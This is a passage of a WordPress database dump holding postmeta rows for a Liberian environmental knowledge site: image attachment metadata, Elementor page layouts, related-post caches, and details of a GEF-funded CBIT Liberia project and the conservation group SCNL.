749,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:554;s:4:\"file\";s:31:\"2019/11/featured_ci_project.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"featured_ci_project-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"featured_ci_project-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"featured_ci_project-768x416.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1574709111\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18789,2748,'_thumbnail_id','2749'),(18790,2748,'_wp_page_template','default'),(18791,2748,'_elementor_controls_usage','a:0:{}'),(18792,2748,'funder','Global Environment Facility (GEF)'),(18793,2748,'partners','Environmental Protection Agency (EPA)'),(18794,2748,'_pods_project_status','On-going'),(18795,2748,'project_status','On-going'),(18796,2748,'project_link','<a href=\"https://www.conservation.org/gef/projects/cbit-liberia\" target=\"_blank\" rel=\"noopener\">https://www.conservation.org/gef/projects/cbit-liberia</a>'),(18797,1612,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628881413;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2769;}i:1;a:1:{s:2:\"id\";i:1614;}i:2;a:1:{s:2:\"id\";i:2965;}}}}'),(18798,2751,'_elementor_controls_usage','a:0:{}'),(18799,2751,'by','CI'),(18800,2751,'year','2018'),(18801,2751,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/9923-cbit-liberia-prodoc.pdf'),(18802,2751,'_pods_cover_image','a:1:{i:0;i:573;}'),(18803,2751,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(18808,2751,'_dp_original','2297'),(18809,2751,'_edit_lock','1670324045:42'),(18810,2751,'_edit_last','42'),(18811,2752,'_wp_attached_file','2019/11/9923-cbit-liberia-prodoc.pdf'),(18813,2751,'_pods_attached_document','a:1:{i:0;i:2752;}'),(18815,1582,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629013717;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3006;}i:1;a:1:{s:2:\"id\";i:2769;}i:2;a:1:{s:2:\"id\";i:1602;}}}}'),(18823,2754,'_wp_page_template','default'),(18824,2754,'_elementor_edit_mode','builder'),(18825,2754,'_elementor_template_type','wp-page'),(18826,2754,'_elementor_version','2.7.5'),(18827,2754,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_tag\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(18829,2755,'_wp_attached_file','2019/11/featured_capacity.jpg'),(18830,2755,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:29:\"2019/11/featured_capacity.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"featured_capacity-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"featured_capacity-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"featured_capacity-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573702754\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18831,481,'_thumbnail_id','2755'),(18833,2756,'_wp_attached_file','2019/11/featured_drought.jpg'),(18834,2756,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:554;s:4:\"file\";s:28:\"2019/11/featured_drought.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"featured_drought-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"featured_drought-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"featured_drought-768x416.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1574713064\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18835,477,'_thumbnail_id','2756'),(18836,2757,'_wp_attached_file','2019/11/featured_land_use.jpg'),(18837,2757,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:554;s:4:\"file\";s:29:\"2019/11/featured_land_use.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"featured_land_use-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"featured_land_use-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"featured_land_use-768x416.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573705802\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18838,486,'_thumbnail_id','2757'),(18839,473,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628647269;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:471;}i:1;a:1:{s:2:\"id\";i:467;}i:2;a:1:{s:2:\"id\";i:470;}}}}'),(18840,2758,'_wp_page_template','default'),(18841,2758,'_elementor_edit_mode','builder'),(18842,2758,'_elementor_template_type','wp-page'),(18843,2758,'_elementor_version','2.7.5'),(18844,2758,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(18848,2759,'_wp_page_template','default'),(18849,2759,'_elementor_edit_mode','builder'),(18850,2759,'_elementor_template_type','wp-page'),(18851,2759,'_elementor_version','2.7.5'),(18852,2759,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(18856,2159,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628869724;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2309;}i:1;a:1:{s:2:\"id\";i:1743;}i:2;a:1:{s:2:\"id\";i:1732;}}}}'),(18868,488,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1623945514;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:477;}i:1;a:1:{s:2:\"id\";i:482;}i:2;a:1:{s:2:\"id\";i:483;}}}}'),(18884,1705,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627612368;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1707;}i:1;a:1:{s:2:\"id\";i:1701;}i:2;a:1:{s:2:\"id\";i:1728;}}}}'),(18885,486,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1627978768;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:477;}i:1;a:1:{s:2:\"id\";i:482;}i:2;a:1:{s:2:\"id\";i:483;}}}}'),(18886,467,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1627618471;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:471;}i:1;a:1:{s:2:\"id\";i:470;}i:2;a:1:{s:2:\"id\";i:473;}}}}'),(18891,2769,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(18892,2769,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(18893,2769,'slide_template','default'),(18894,2769,'slide_template','default'),(18897,2769,'_elementor_template_type','wp-post'),(18898,2769,'_elementor_template_type','wp-post'),(18899,2769,'_elementor_version','2.7.5'),(18900,2769,'_elementor_version','2.7.5'),(18901,2769,'_wp_page_template','default'),(18902,2769,'_wp_page_template','default'),(18903,2769,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 